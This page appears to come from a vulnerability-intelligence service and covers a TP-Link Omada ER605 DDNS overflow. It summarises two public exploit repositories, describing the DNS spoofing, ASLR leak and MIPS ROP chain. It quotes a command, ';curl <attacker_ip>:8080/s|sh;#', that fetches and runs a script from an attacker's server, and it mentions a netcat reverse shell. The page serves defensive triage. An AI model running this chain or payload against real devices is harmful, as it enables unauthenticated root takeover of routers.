TP-Link Omada ER605 contains a buffer overflow in its handling of DNS names when the device is configured to use the Comexe DDNS service. The flaw is caused by missing length validation of attacker-controlled data prior to copying into a fixed-size buffer, enabling a network-adjacent, unauthenticated attacker to trigger memory corruption and achieve remote code execution. Successful exploitation yields code execution in the context of root. (ZDI-CAN-22523)
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
Repository contains a single Python proof-of-concept exploit (exploit.py) plus documentation (README.md) for a chained pre-auth RCE against TP-Link Omada ER605’s DDNS client daemon (cmxddnsd) when configured for the Comexe DDNS service. The exploit chain maps to CVE-2024-5244 (DDNS message spoofing/impersonation enabled by obscurity/weak protocol protections), CVE-2024-5243 (buffer overflow affecting DNS-name-related state used to enable an ASLR-bypass leak), and CVE-2024-5242 (stack-based overflow in DDNS error-code handling used for control-flow hijack). Operationally, the script sets up two network services on the attacker machine: (1) a DNS server on UDP/53 to spoof DNS answers so the router resolves the Comexe DDNS host (Dns1.comexe.net) to the attacker, and (2) a malicious DDNS server on UDP/9994 to deliver crafted DDNS responses. The exploit is explicitly two-phase: Phase 1 triggers an out-of-bounds read/info leak (via a BSS overflow influencing a sendSize in the DNS query sending path, referenced as _sndDnsQuery) to recover a libc pointer and compute the libc base (ASLR bypass). Phase 2 uses a stack overflow in the ErrorCode parsing path to overwrite saved registers ($s0/$s1/$ra) and execute a MIPS ROP gadget (move $t9,$s0; jalr $t9; move $a0,$s1) to call system(command). The default command constructed in main is ';curl <attacker_ip>:8080/s|sh;#'. The code includes a custom crypto/encoding implementation (DES with a VNC-style bit-reversed key and a custom Base64 alphabet) consistent with crafting/validating DDNS protocol messages (CVE-2024-5244). Critical build-specific constants (libc offsets, gadget offsets, leak offsets) are left as 0x0 placeholders, so the PoC requires reverse engineering/dynamic analysis of the target firmware/libc to become fully functional. Overall, this is a real exploit PoC with a basic hardcoded payload and clear network preconditions (MITM/DNS spoofing + DDNS server impersonation).
Repository contains a single Python exploit (`exploit.py`) plus documentation (`README.md`) for a pre-auth RCE chain against TP-Link Omada ER605’s DDNS client daemon `cmxddnsd`. The exploit is designed for a network attacker with a WAN-side MITM position: it runs (1) a spoofing DNS server on UDP/53 to redirect the router’s lookup of `Dns1.comexe.net` to the attacker, and (2) a malicious DDNS server on UDP/9994 to deliver crafted protocol responses. Exploit chain/capabilities: - Uses CVE-2024-5244 (hardcoded crypto material) to generate/accept protocol messages (custom Base64 alphabet and DES/3DES-style routines are implemented in the script; the actual key is redacted/placeholder). - Phase 1 (CVE-2024-5242): triggers a BSS overflow leading to an out-of-bounds read/info leak to recover a libc pointer and compute libc base (ASLR bypass). Parameters like `OFFSET_TO_SENDSIZE` and `INFO_LEAK_SIZE` are present; parsing offsets are left as placeholders. - Phase 2 (CVE-2024-5243): triggers a stack overflow in the `ErrorCode` field to overwrite saved registers and return address, building a MIPS ROP chain that calls `system()` with a command string. The script’s default command is `;curl <ATTACKER_IP>:8080/s|sh;#`, intended to fetch a second-stage shell script from an attacker HTTP server; README provides an example reverse shell using netcat back to TCP/9999. Operational notes/structure: - `exploit.py` is the entry point (has `main()` and starts threads/servers). It includes substantial embedded crypto code (DES tables, custom base64 mapping) and exploit logic for the two phases. - Several critical offsets are intentionally unset (`0x0`) and must be determined per firmware/libc build (system offset, gadget offset, cached command-string location, and leak parsing offsets). With those filled, the exploit provides unauthenticated root command execution on vulnerable ER605 firmware versions prior to 2.2.4.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.